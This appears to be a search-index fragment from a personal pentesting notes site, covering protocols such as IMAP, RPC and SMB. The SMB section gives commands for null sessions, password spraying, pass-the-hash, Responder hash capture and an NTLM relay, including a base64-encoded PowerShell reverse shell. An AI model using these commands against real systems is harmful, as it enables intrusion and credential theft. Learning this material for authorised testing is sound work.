                        ","tags":["tags"]},{"location":"tags/#web-server","title":"web server","text":"
                        • httprint - A web server fingerprinting tool
                        ","tags":["tags"]},{"location":"tags/#web-shells","title":"web shells","text":"
                        • Laudanum - Injectable Web Exploit Code
                        ","tags":["tags"]},{"location":"tags/#webpentesting","title":"webpentesting","text":"
                        • Pentesting OData
                        • Phpggc - A tool for PHP deserialization
                        • Ysoserial - A tool for Java deserialization
                        ","tags":["tags"]},{"location":"tags/#webservices","title":"webservices","text":"
                        • Pentesting web services
                        ","tags":["tags"]},{"location":"tags/#webshell","title":"webshell","text":"
                        • Web Shells
                        • WhiteWinterWolf php webshell
                        ","tags":["tags"]},{"location":"tags/#windows","title":"windows","text":"
                        • Port 389 - 636 LDAP
                        • Active Directory - LDAP
                        • The ActiveDirectory PowerShell module
                        • Arp poisoning
                        • arpspoof from dsniff
                        • BloodHound
                        • CFF explorer
                        • CrackMapExec
                        • enum
                        • enum4linux
                        • Markup - A HackTheBox machine
                        • Tactics - A HackTheBox machine
                        • hydra
                        • SMBExec - a module from Impacket
                        • Impacket - A python tool for network protocols
                        • Index for Windows Privilege Escalation
                        • Invoke-TheHash
                        • medusa
                        • mimikatz
                        • mitm_relay Suite
                        • Microsoft Management Console (MMC)
                        • NetBIOS - Network Basic Input Output System
                        • NT Authority System
                        • Pass The Hash
                        • PowerUp.ps1
                        • pyftpdlib - A ftp server written in python
                        • pypykatz
                        • rdesktop
                        • Responder.py - A SMB server to listen to NTLM hashes
                        • SharpView
                        • SirepRAT - RCE as SYSTEM on Windows IoT Core
                        • SysInternals Suite
                        • Transferring files techniques - Windows
                        • Virtualbox and Extension Pack
                        • WebDAV - WsgiDAV - A generic and extendable WebDAV server
                        • Window Detective - A tool to view windows properties in the system
                        • Windows binaries - LOLBAS
                        • Windows credentials storage
                        • Recently accessed files and executed commands
                        • winPEAS - Windows Privilege Escalation Awesome Scripts
                        • winspy - A tool to view windows properties in the system
                        • xfreerdp
                        • HTTP Authentication Schemes
                        ","tags":["tags"]},{"location":"tags/#windows-pentesting","title":"windows pentesting","text":"
                        • JAWS - Just Another Windows (Enum) Script
                        • Seatbelt - A tool to scan Windows system
                        ","tags":["tags"]},{"location":"tags/#windows-privilege-escalation","title":"windows privilege escalation","text":"
                        • Privilege escalation - Weak service file permission
                        ","tags":["tags"]},{"location":"tags/#windows-remote-management","title":"windows remote management","text":"
                        • evil-winrm
                        ","tags":["tags"]},{"location":"tags/#winrm","title":"winrm","text":"
                        • Port 5985, 5986 - WinRM - Windows Remote Management
                        ","tags":["tags"]},{"location":"tags/#wireshark","title":"wireshark","text":"
                        • Information gathering phase - Thick client Applications
                        • Traffic analysis - Thick client Applications
                        ","tags":["tags"]},{"location":"tags/#wordpress","title":"wordpress","text":"
                        • Pentesting Keycloak
                        • pentesting wordpress
                        • wpscan - Wordpress Security Scanner
                        ","tags":["tags"]},{"location":"tags/#xor-encryption","title":"xor encryption","text":"
                        • Bypassing IPS with handmade XOR Encryption
                        ","tags":["tags"]},{"location":"tags/#xss","title":"xss","text":"
                        • BurpSuite Labs - Cross-site Scripting
                        • XSS attack - Cross-Site Scripting
                        ","tags":["tags"]},{"location":"tags/#xxe","title":"xxe","text":"
                        • Markup - A HackTheBox machine
                        • XXE - XEE XML External Entity attack
                        ","tags":["tags"]}]} \ No newline at end of file +{"config":{"lang":["en"],"separator":"[\\s\\-]+","pipeline":["stopWordFilter"]},"docs":[{"location":"","title":"Welcome to Hacking Life!","text":"

                        HackingLife is born from the urge to document the knowledge acquired in the cybersecurity field and the need of being able to retrieve it.

                        But there is something else: I strongly believe there is not much difference between fixing a broken faucet (or opening a lock, or studying the engine of your car, or walking in the countryside, or\u2026) and assessing an environment and describing its vulnerabilities. As a matter of fact, I spend my time doing all these things: fixing, repairing, and creating narratives (yes, writing too) in which magically all parts work together harmonically (or provoke the end of the world harmonically too). Tadam!

                        ","tags":["pentesting","cybersecurity"]},{"location":"#second-brain","title":"Second brain","text":"

                        It's quite intriguing how brains work: no matter how much information and how many resources you have available on the Internet, this is still something you need to do for and by yourself if you want to understand in a deep sense what you are doing, keep track of it, and so on.

                        So, to be more than clear again: the main reason for this repository to exist is purely selfish. It's me being able to retrieve my notes and build upon them a second brain. Therefore, there is no intention of being exhaustive or giving thoughtful explanations about how things work on a deep level.

                        ","tags":["pentesting","cybersecurity"]},{"location":"#acknowledgments","title":"Acknowledgments","text":"

                        Nevertheless (and to be fair) this idea is deeply inspired by Lyz-code and their Blue book. Thanks to this inspiring, polished, and... overwhelming repository I've found a way to start making sense of all my notes. Kudos!

                        Finally, I would like to highlight that this content may not be entirely original, as I've included some paragraphs directly from different sources. Most of the time, I've included a section at the top of the page to quote sources.

                        ","tags":["pentesting","cybersecurity"]},{"location":"0-255-ICMP-internet-control-message-protocol/","title":"0-255 icmp","text":"

                        Internet Control Message Protocol (ICMP) is a protocol used by devices to communicate with each other on the Internet for various purposes, including error reporting and status information. It sends requests and messages between devices:

                        ICMP Requests: A request is a message sent by one device to another to request information or perform a specific action.

                        • Echo Request: This message tests whether a device is reachable on the network. When a device sends an echo request, it expects to receive an echo reply message. For example, tracert (Windows) relies on ICMP echo requests, and traceroute (Linux) can be told to use them with the -I flag.
                        • Timestamp Request: This message determines the time on a remote device.
                        • Address Mask Request: This message is used to request the subnet mask of a device.

                        ICMP Messages: A message in ICMP can be either a request or a reply. In addition to ping requests and responses, ICMP supports other types of messages, such as error messages, destination unreachable, and time exceeded messages.

                        • Echo reply: This message is sent in response to an echo request message.
                        • Destination unreachable: This message is sent when a device cannot deliver a packet to its destination.
                        • Redirect: A router sends this message to inform a device that it should send its packets to a different router.
                        • Time exceeded: This message is sent when a packet's time to live (TTL) expires before it reaches its destination.
                        • Parameter problem: This message is sent when there is a problem with a packet's header.
                        • Source quench: This message is sent when a device receives packets too quickly and cannot keep up. It is used to slow down the flow of packets.
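
                        As a quick sketch of the request/reply pairs described above, the commands below elicit ICMP traffic (ping sends echo requests; on Linux, traceroute can be forced to use ICMP echo with -I):

                        # Send a single ICMP echo request and wait for the echo reply\nping -c 1 $ip\n\n# Trace the route using ICMP echo requests instead of the UDP default (Linux)\nsudo traceroute -I $ip\n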
                        "},{"location":"1090-java-rmi/","title":"1090 Pentesting Java RMI","text":"

                        The Java Remote Method Invocation (RMI) system allows an object running in one Java virtual machine to invoke methods on an object running in another Java virtual machine. RMI provides for remote communication between programs written in the Java programming language.

                        A Java RMI registry is a simplified name service that allows clients to get a reference (a stub) to a remote object.

                        When developers want to make their Java objects available within the network, they usually bind them to an RMI registry. The registry stores all information required to connect to the object (IP address, listening port, implemented class or interface and the ObjID value) and makes it available under a human readable name (the bound name). Clients that want to consume the RMI service ask the RMI registry for the corresponding bound name and the registry returns all required information to connect. Thus, the situation is basically the same as with an ordinary DNS service.

                        ","tags":["java rmi","port 1090"]},{"location":"1090-java-rmi/#enumeration","title":"Enumeration","text":"
                        # Dump information from the RMI registry.\nnmap --script rmi-dumpregistry -p 1099 <target>\n

                        In the resulting output, the name bound to the RMI registry is CustomRMIServer. It implements the java.rmi.Remote interface, as you would expect; that is what makes it possible to invoke methods on the server remotely.

                        remote-method-guesser is a Java RMI vulnerability scanner that is capable of identifying common RMI vulnerabilities automatically. Whenever you identify an RMI endpoint, you should give it a try:

                        rmg enum $ip 9010\n
                        ","tags":["java rmi","port 1090"]},{"location":"110-143-993-995-imap-pop3/","title":"Ports 110, 143, 993, 995 IMAP POP3","text":"

                        The Internet Message Access Protocol (IMAP) allows access to emails stored on a mail server.

                        Unlike the Post Office Protocol (POP3), IMAP allows online management of emails directly on the server and supports folder structures. Protocols such as IMAP are therefore needed for additional functionality such as hierarchical mailboxes directly at the mail server, access to multiple mailboxes during a session, and preselection of emails. IMAP is text-based and has extended functions, such as browsing emails directly on the server. It is also possible for several users to access the email server simultaneously. By default, IMAP works unencrypted, transmitting commands, emails, usernames, and passwords in plain text over the standard port 143; the TLS-encrypted connection uses an alternative port such as 993.

                        POP3, by contrast, only provides listing, retrieving, and deleting emails as functions at the email server. It uses the standard port 110 unencrypted; the TLS-encrypted connection uses an alternative port such as 995.
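
                        As a minimal sketch of the protocol itself, a plaintext POP3 session can be driven by hand with netcat (username, password, and message ID are placeholders):

                        nc $ip 110\nUSER username\nPASS password\nSTAT\nLIST\nRETR 1\nQUIT\n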

                        ","tags":["port 110","port 143","port 993","port 995","imap","pop3"]},{"location":"110-143-993-995-imap-pop3/#footprinting-imap-pop3","title":"Footprinting IMAP / POP3","text":"
                        sudo nmap $ip -sV -p110,143,993,995 -sC\n
                        ","tags":["port 110","port 143","port 993","port 995","imap","pop3"]},{"location":"110-143-993-995-imap-pop3/#connect-to-an-imap-pop3-server","title":"Connect to an IMAP /POP3 server","text":"
                        curl -k "imaps://$ip" --user user:p4ssw0rd -v\n

                        To interact with the IMAP or POP3 server over SSL, we can use openssl, as well as ncat. The commands for this would look like this:

                        openssl s_client -connect $ip:pop3s\n
                        openssl s_client -connect $ip:imaps\n
                        ","tags":["port 110","port 143","port 993","port 995","imap","pop3"]},{"location":"110-143-993-995-imap-pop3/#basic-imap-commands","title":"Basic IMAP commands","text":"
                        # User's login\na LOGIN username password\n\n# Lists all directories\na LIST \"\" *\n\n# Creates a mailbox with a specified name\na CREATE \"INBOX\" \n\n# Deletes a mailbox\na DELETE \"INBOX\" \n\n# Renames a mailbox\na RENAME \"ToRead\" \"Important\"\n\n# Returns a subset of names from the set of names that the User has declared as being active or subscribed\na LSUB \"\" *\n\n# Selects a mailbox so that messages in the mailbox can be accessed\na SELECT INBOX\n\n# Exits the selected mailbox\na UNSELECT INBOX\n\n# Retrieves data (parts of the message) associated with a message in the mailbox\na FETCH <ID> all\n# If you want to retrieve the body:\na FETCH <ID> BODY.PEEK[TEXT]\n\n# Removes all messages with the `Deleted` flag set\na CLOSE\n\n# Closes the connection with the IMAP server\na LOGOUT\n
                        ","tags":["port 110","port 143","port 993","port 995","imap","pop3"]},{"location":"110-143-993-995-imap-pop3/#basic-pop3-commands","title":"Basic POP3 commands","text":"
                        # Identifies the user\nUSER username\n\n# Authentication of the user using its password\nPASS password\n\n# Requests the number of saved emails from the server\nSTAT\n\n# Requests from the server the number and size of all emails\nLIST \n\n# Requests the server to deliver the requested email by ID\nRETR id\n\n# Requests the server to delete the requested email by ID\nDELE id\n\n# Requests the server to display the server capabilities\nCAPA\n\n# Requests the server to reset the transmitted information\nRSET\n\n# Closes the connection with the POP3 server\nQUIT\n
                        ","tags":["port 110","port 143","port 993","port 995","imap","pop3"]},{"location":"110-143-993-995-imap-pop3/#installing-a-mail-server-evolution","title":"Installing a mail server: Evolution","text":"
                        sudo apt-get install evolution\n
                        ","tags":["port 110","port 143","port 993","port 995","imap","pop3"]},{"location":"111-32731-rpc/","title":"Port 111, 32731 - rpc","text":"

                        The portmapper (rpcbind) service provides information between Unix-based systems: it maps RPC program numbers to the ports they listen on. The port is often probed; it can be used to fingerprint the *nix OS and to obtain information about available services. The port is used with NFS, NIS, or any RPC-based service. See rpcclient.

                        Default port: 111/TCP/UDP, 32771 in Oracle Solaris.

                        RPCBind + NFS
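
                        As a quick sketch, the portmapper can be queried directly for registered services, and any exported NFS shares listed (assuming the standard rpcinfo and showmount client tools are installed):

                        # List registered RPC programs and the ports they listen on\nrpcinfo -p $ip\n\n# Same information via an nmap NSE script\nnmap -sV -p111 --script=rpcinfo $ip\n\n# If NFS is registered, list the exported shares\nshowmount -e $ip\n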

                        ","tags":["port 111","rpc","NFS","Network File System"]},{"location":"135-windows-management-instrumentation-wmi/","title":"135 wmi","text":"

                        Windows Management Instrumentation (WMI) is Microsoft's implementation and also an extension of the Common Information Model (CIM), core functionality of the standardized Web-Based Enterprise Management (WBEM) for the Windows platform. WMI allows read and write access to almost all settings on Windows systems. Understandably, this makes it the most critical interface in the Windows environment for the administration and remote maintenance of Windows computers, regardless of whether they are PCs or servers. WMI is typically accessed via PowerShell, VBScript, or the Windows Management Instrumentation Console (WMIC). WMI is not a single program but consists of several programs and various databases, also known as repositories.

                        "},{"location":"135-windows-management-instrumentation-wmi/#footprinting-the-service","title":"Footprinting the service","text":"

                        The initialization of the WMI communication always takes place on TCP port 135, and after the successful establishment of the connection, the communication is moved to a random port. For example, the program wmiexec.py from the Impacket toolkit can be used for this.

                        /usr/share/doc/python3-impacket/examples/wmiexec.py <username>:<\"password\">@$ip <hostname>\n
                        "},{"location":"135-windows-management-instrumentation-wmi/#source","title":"Source","text":"

                        HackTheBox Academy

                        "},{"location":"137-138-139-445-smb/","title":"Ports 137, 138, 139, 445 SMB","text":"

                        Server Message Block (SMB) is a client-server protocol that regulates access to files and entire directories and other network resources such as printers, routers, or interfaces released for the network. It runs mainly on Windows, but with the free software project Samba there is also a solution that enables the use of SMB in Linux and Unix distributions, and thus cross-platform communication via SMB.

                        Basically, an SMB server provides arbitrary parts of its local file system as shares. Therefore, the hierarchy visible to a client is partially independent of the structure on the server.

                        Samba is an alternative implementation of the SMB server, developed for Unix-based operating systems. Samba implements the Common Internet File System (CIFS) network protocol. CIFS is a "dialect" of SMB: a very specific implementation of the SMB protocol, which in turn was created by Microsoft. This allows Samba to communicate with newer Windows systems, which is why it usually is referred to as SMB / CIFS. When we pass SMB commands over Samba to an older NetBIOS service, it connects to the Samba server over TCP ports 137, 138, and 139, but CIFS uses TCP port 445 only. There are several versions of SMB, including outdated versions that are still used in specific infrastructures. Nowadays, modern Windows operating systems use SMB over TCP but still support the NetBIOS implementation as a failover.

                        | SMB Version | Supported | Features |
                        | --- | --- | --- |
                        | CIFS | Windows NT 4.0 | Communication via NetBIOS interface |
                        | SMB 1.0 | Windows 2000 | Direct connection via TCP |
                        | SMB 2.0 | Windows Vista, Windows Server 2008 | Performance upgrades, improved message signing, caching feature |
                        | SMB 2.1 | Windows 7, Windows Server 2008 R2 | Locking mechanisms |
                        | SMB 3.0 | Windows 8, Windows Server 2012 | Multichannel connections, end-to-end encryption, remote storage access |
                        | SMB 3.0.2 | Windows 8.1, Windows Server 2012 R2 | |
                        | SMB 3.1.1 | Windows 10, Windows Server 2016 | Integrity checking, AES-128 encryption |
                        • On Windows, SMB can run directly over port 445 TCP/IP without the need for NetBIOS over TCP/IP
                        • But if Windows has NetBIOS enabled, or we are targeting a non-Windows host, we will find SMB running on port 139 TCP/IP. This means that SMB is running with NetBIOS over TCP/IP.
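
                        To check which of the dialects from the table above a target actually speaks, and on which port, the smb-protocols NSE script gives a quick sketch:

                        # Enumerate the SMB dialects supported by the target\nnmap -p139,445 --script smb-protocols $ip\n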

                        In a network, each host participates in the same workgroup. A workgroup is a group name that identifies an arbitrary collection of computers and their resources on an SMB network. There can be multiple workgroups on the network at any given time. IBM developed an application programming interface (API) for networking computers called the Network Basic Input/Output System (NetBIOS). The NetBIOS API provided a blueprint for an application to connect and share data with other computers. In a NetBIOS environment, when a machine goes online, it needs a name, which is done through the so-called name registration procedure. Either each host reserves its hostname on the network, or the NetBIOS Name Server (NBNS) is used for this purpose. It also has been enhanced to Windows Internet Name Service (WINS).
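
                        As a small sketch of this naming layer, the NetBIOS name table a host has registered can be queried with nmblookup (from the Samba suite) or nbtscan:

                        # Query the NetBIOS name table of a host\nnmblookup -A $ip\n\n# Scan a host (or a range) for NetBIOS name information\nnbtscan $ip\n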

                        Another protocol that is commonly related to SMB is MSRPC (Microsoft Remote Procedure Call). RPC provides an application developer with a generic way to execute a procedure (a.k.a. a function) in a local or remote process without having to understand the network protocols used to support the communication.

                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#footprinting-smb","title":"Footprinting smb","text":"

                        nmap

                        sudo nmap $ip -sV -sC -p139,445\n\n# Script for interacting with the SMB service to extract the reported operating system version.\nnmap --script smb-os-discovery.nse -p445 $ip\n\n# Service scanning\nnmap -A -p445 $ip\n

                        smbmap

                        # Enumerate network shares and the associated access permissions.\nsmbmap -H $ip\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#typical-attacks","title":"Typical attacks","text":"

                        For some of these attacks we will use smbclient. See installation, connection and syntax in smbclient

                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#1-null-attack","title":"1. Null attack","text":"
                        # Connect to smb. [-L|--list=HOST]: Select the targeted host for the connection request.\nsmbclient -N -L //$ip\n# -N: Suppresses the password prompt.\n# -L: retrieve a list of available shares on the remote host\n

                        Smbclient will attempt to connect to the remote host and check if there is any authentication required. If there is, it will ask for a password for our local username: if we do not specify a specific username to smbclient when attempting to connect, it will just use the local machine's username.

                        Without the -N parameter, we will be prompted for a password. We can leave the password field blank and simply hit Enter to move along.

                        After authenticating, we may obtain access to some typical shared folders, such as:

                        ADMIN$ - Administrative shares are hidden network shares created by the Windows NT family of operating systems that allow system administrators to have remote access to every disk volume on a network-connected system. These shares may not be permanently deleted but may be disabled.\n\nC$ - Administrative share for the C:\\ disk volume. This is where the operating system is hosted.\n\nIPC$ - The inter-process communication share. Used for inter-process communication via named pipes and is not part of the file system.\nWorkShares - Custom share. \n

                        We will try to connect to each of the shares except IPC$, which is not browsable like a regular directory and does not contain any files that are useful to us at this stage:

                        # the use of / and \\ might be different if you need to escape some characters\nsmbclient \\\\\\\\$ip\\\\ADMIN$\n

                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#2-smb2-security-levels","title":"2. smb2 security levels","text":"

                        To detect the message signing configuration, run:

                        nmap --script smb2-security-mode -p 445 $ip\n# Add -Pn to skip host discovery if ping probes are blocked\n

                        Output:

                        | smb2-security-mode:\n|   2.02:\n|_    Message signing enabled but not required\n

                        There are three potential results for the message signing:

                        1. Message signing disabled.

                        2. Message signing enabled but not required (default for SMB2).

                        3. Message signing enabled and required.

                        Options 1 and 2 are vulnerable to SMB relay attacks. Option 3 is the most secure option.

                        In case 1, the attack is similar to the null-session attack described above. In case 2, we can bypass the login by leaving the password blank while still including a username in the request:

                        smbclient -L \\\\$ip -U Administrator\n# -L: retrieve a list of available shares on the remote host\n# -U: user \n\nsmbclient -N -L \\\\$ip\n# -N: Suppresses the password prompt.\n

                        Important: sometimes some juggling with the slashes is needed:

                        smbclient -N -L \\\\$ip\nsmbclient -N -L \\\\\\\\$ip\nsmbclient -N -L /\\/\\$ip\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#3-signing-enabled-but-not-required","title":"3. Signing enabled but not required","text":"

                        HackTheBox machine: Tactics

                        After running an nmap scan with scripts enabled (nmap -sC -A 10.129.228.98 -Pn -p-), you get this response:

                        | smb2-security-mode: \n|   3.11: \n|_    Message signing enabled but not required\n

                        This allows us to enumerate shares with smbclient without providing a password when signing into the shared folder. For that, we will use a well-known Windows user: Administrator.

                        smbclient -L $ip -U Administrator\n

                        Same thing is possible with rpcclient:

                        # Connect to a remote shared folder (same as smbclient in this regard)\nrpcclient -U \"\" $ip\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#4-brute-force","title":"4. Brute force","text":"","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#user-enumeration-with-rpcclient","title":"User enumeration with rpcclient","text":"
                        # Brute forcing user enumeration with rpcclient:\nfor i in $(seq 500 1100);do rpcclient -N -U \"\" $ip -c \"queryuser 0x$(printf '%x\\n' $i)\" | grep \"User Name\\|user_rid\\|group_rid\" && echo \"\";done\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#password-spraying-with-crackmapexec","title":"Password spraying with crackmapexec","text":"
                        crackmapexec smb $ip -u /folder/userlist.txt -p '<password>' --local-auth --continue-on-success\n# --continue-on-success: continue spraying even after a valid password is found. Useful for spraying a single password against a large user list\n# --local-auth: if we are targeting a non-domain joined computer, we will need to use this option\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#module-smb_login-in-metasploit","title":"Module smb_login in metasploit","text":"

                        With metasploit, use the module: auxiliary/scanner/smb/smb_login

                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#5-remote-code-execution-rce-with-psexec-smbexec-crackmapexec","title":"5. Remote Code Execution (RCE) with PsExec, SmbExec, crackMapExec","text":"

                        PsExec is a tool from the SysInternals Suite that lets us execute processes on other systems, complete with full interactivity for console applications, without having to install client software manually. It works because it has a Windows service image inside of its executable. It takes this service and deploys it to the admin$ share (by default) on the remote machine. It then uses the DCE/RPC interface over SMB to access the Windows Service Control Manager API. Next, it starts the PsExec service on the remote machine. The PsExec service then creates a named pipe that can send commands to the system.

                        Alternatives to PsExec from SysInternals: Impacket PsExec, Impacket SMBExec, Impacket atexec (this one executes a command on the target machine through the Task Scheduler service and returns the output of the executed command), CrackMapExec, and Metasploit PsExec (a Ruby PsExec implementation).

                        # Connect to a remote machine with a local administrator account\nimpacket-psexec administrator:'<password>'@$ip\n\n# Connect to a remote machine with a local administrator account\nimpacket-smbexec administrator:'<password>'@$ip\n\n# Connect to a remote machine with a local administrator account\nimpacket-atexec  administrator:'<password>'@$ip\n

                        RCE with crackmapexec:

                        # If the --exec-method is not defined, CrackMapExec will try to execute the atexec method; if it fails, you can try to specify --exec-method smbexec.\ncrackmapexec smb $ip -u Administrator -p '<password>' -x 'whoami' --exec-method smbexec\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#6-pass-the-hash-pth-with-crackmapexec","title":"6. Pass the Hash (PtH) with crackmapexec","text":"
                        # Using a hash instead of a password to authenticate ourselves: Pass the Hash attack (PtH)\ncrackmapexec smb $ip -u <username> -H <hash> -d <DOMAIN>\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#7-forced-authentication-attacks","title":"7. Forced Authentication Attacks","text":"

                        We can also abuse the SMB protocol by creating a fake SMB server to capture users' NetNTLM v1/v2 hashes. The most common tool to perform such operations is Responder, an LLMNR, NBT-NS, and mDNS poisoner with different capabilities; one of them is the ability to set up fake services, including SMB, to steal NetNTLM v1/v2 hashes.

                        ./Responder.py -I [interface] -w -d\n# -I: Set interface \n# -w: Start the WPAD rogue proxy server. Default value is False\n# -d: Enable answers for DHCP broadcast requests. This option will inject a WPAD server in the DHCP response. Default: False\n\n# In the HTB machine responder:\n./Responder.py -I tun0 -w -d\n

                        All saved hashes are located in Responder's logs directory (/usr/share/responder/logs/). We can copy the hash to a file and attempt to crack it using hashcat mode 5600.

                        hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#8-ntlm-relay-attack","title":"8. NTLM relay attack","text":"

                        If we capture a hash but cannot crack it, we can try an NTLM relay attack with impacket-ntlmrelayx or Responder's MultiRelay.py.

                        Step 1: Set SMB to OFF in our responder configuration file (/etc/responder/Responder.conf).

                        cat /etc/responder/Responder.conf | grep 'SMB ='\n

                        Step 2: Launch proxy and get SAM database

                        # impacket-ntlmrelayx will dump the SAM database by default\nimpacket-ntlmrelayx --no-http-server -smb2support -t $ip\n# --no-http-server: disable the rogue HTTP server, since we only relay SMB here\n# -smb2support: add support for SMB2 targets\n# -t: target ip\n

                        Step 3: Create a PowerShell reverse shell using https://www.revshells.com/

                        # Use option to encode it in base 64\npowershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADIAMgAwAC4AMQAzADMAIgAsADkAMAAwADEAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA\n

                        Step 4: Use the captured hash to launch a reverse shell. Commands in impacket-ntlmrelayx can be executed with flag -c.

                         impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADIAMgAwAC4AMQAzADMAIgAsADkAMAAwADEAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA'\n

                        Step 5: Finally, launch a listener. Once the victim authenticates to our server, we poison the response and make it execute our command to obtain a reverse shell.

                        nc -lnvp 9002\n
                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#9-smbghost","title":"9. SMBGhost","text":"

                        SMBGhost is the name given to CVE-2020-0796.

                        The vulnerability lies in the compression mechanism of SMB v3.1.1, which made Windows 10 versions 1903 and 1909 vulnerable to attack by an unauthenticated attacker. The vulnerability allows the attacker to gain remote code execution (RCE) and full access to the remote target system. In simple terms, it is an integer overflow in a function of an SMB driver that allows system commands to be overwritten while memory is accessed.

                        POC: https://www.exploit-db.com/exploits/48537

                        ","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#enumeration","title":"Enumeration","text":"","tags":["smb","port 445","port 137","port 138","port 139","samba"]},{"location":"137-138-139-445-smb/#rpcclient","title":"rpcclient","text":"

                        See RPC installation and basic commands.

